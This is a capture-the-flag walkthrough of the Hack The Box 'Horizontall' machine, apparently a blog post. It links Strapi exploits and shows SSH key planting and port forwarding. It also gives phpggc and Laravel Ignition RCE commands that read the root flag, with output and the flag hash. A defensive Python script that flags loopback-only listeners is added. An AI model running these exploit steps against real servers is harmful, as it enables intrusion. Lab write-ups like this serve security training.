HTB-Horizontall

Posted by admin

Horizontall

Date: August 31, 2021
Level: Easy
Summary: 1. A subdomain found in a JS file
2. JWT leads to RCE on Strapi
3. SSH port forwarding
4. Laravel v8 RCE
Tags: Laravel, port forwarding

Port scan

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

A subdomain was found in a JS file.

Exploitation

https://www.exploit-db.com/exploits/50239

https://www.exploit-db.com/exploits/50237

strapi

$ netstat -antlp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:1337          0.0.0.0:*               LISTEN      1789/node /usr/bin/ 
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -

Ports 8000 and 1337 are also listening locally (bound to 127.0.0.1 only).
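A loopback bind is often treated as "not exposed", but the netstat output above shows why a hardening review should still list such services: every local account can reach them, and any account with SSH access can publish them to its own machine with local forwarding. The following parser is an added example, not part of the original write-up; it takes `netstat -antlp` text (the sample embedded below is the output quoted above) and reports every TCP listener bound only to a loopback address. The function names and the report wording are this example's own.

```python
"""Flag loopback-only TCP listeners in `netstat -antlp` output (added example)."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample: the netstat output quoted in the write-up.
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:1337          0.0.0.0:*               LISTEN      1789/node /usr/bin/
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -
"""

# 127/8, IPv6 loopback, and IPv4-mapped loopback all count as "local only".
LOOPBACK = re.compile(r"^(127\.\d+\.\d+\.\d+|::1|::ffff:127\.\d+\.\d+\.\d+)$")


@dataclass(frozen=True)
class Listener:
    proto: str
    address: str
    port: int
    program: str  # PID/Program name column; "-" when netstat ran without privileges

    @property
    def loopback_only(self) -> bool:
        return bool(LOOPBACK.match(self.address))


def parse_netstat(output: str) -> list[Listener]:
    """Return the TCP sockets in LISTEN state from `netstat -antlp` text."""
    listeners: list[Listener] = []
    for line in output.splitlines():
        # At most 7 columns; the program name may itself contain spaces.
        fields = line.split(None, 6)
        if len(fields) < 6 or fields[0] not in ("tcp", "tcp6"):
            continue  # header, blank line, or a non-TCP row
        proto, local, state = fields[0], fields[3], fields[5]
        if state != "LISTEN":
            continue
        address, port = local.rsplit(":", 1)  # rsplit copes with IPv6 like ::1:8000
        program = fields[6].strip() if len(fields) == 7 else "-"
        listeners.append(Listener(proto, address, int(port), program))
    return listeners


def loopback_only_listeners(output: str) -> list[Listener]:
    """Listeners that are invisible from the network but reachable by any local user."""
    return [l for l in parse_netstat(output) if l.loopback_only]


def review(output: str) -> list[str]:
    """One finding per loopback-only listener, phrased for a hardening report."""
    findings = []
    for l in loopback_only_listeners(output):
        owner = l.program if l.program != "-" else "owner not shown (netstat not run as root)"
        findings.append(
            f"{l.proto} {l.address}:{l.port} [{owner}] is loopback-only: "
            "reachable by every local account and exposable with ssh -L; "
            "it still needs authentication or socket-level access control"
        )
    return findings


if __name__ == "__main__":
    for finding in review(SAMPLE_NETSTAT):
        print(finding)
```

On the sample, the report lists 127.0.0.1:1337 (the Node process) and 127.0.0.1:8000 (owner unknown because the listing was taken as an unprivileged user); running the same check as root fills in the PID/Program column so the owning service can be identified.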

curl 127.0.0.1:8000

Laravel v8 is running.

Use SSH to forward the port out.

Create a .ssh directory in the user's home directory, generate the key pair on Kali, write the public key to authorized_keys and upload it to the host.

➜ .ssh cat id_rsa.pub > authorized_keys

Port forwarding

ssh -i ~/.ssh/id_rsa -L 8000:127.0.0.1:8000 strapi@horizontall.htb

Root

➜  phpggc git:(master) php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system "cat /root/root.txt"
➜  phpggc git:(master) python3 ../laravel-exploits/laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar                              
+ Log file: /home/developer/myproject/storage/logs/laravel.log
+ Logs cleared
+ Successfully converted to PHAR !
+ Phar deserialized
--------------------------
d81660812e51818997acccae1f11ef9b
--------------------------
+ Logs cleared

References

Strapi CVE-2019-18818 password reset vulnerability

Laravel V8 RCE
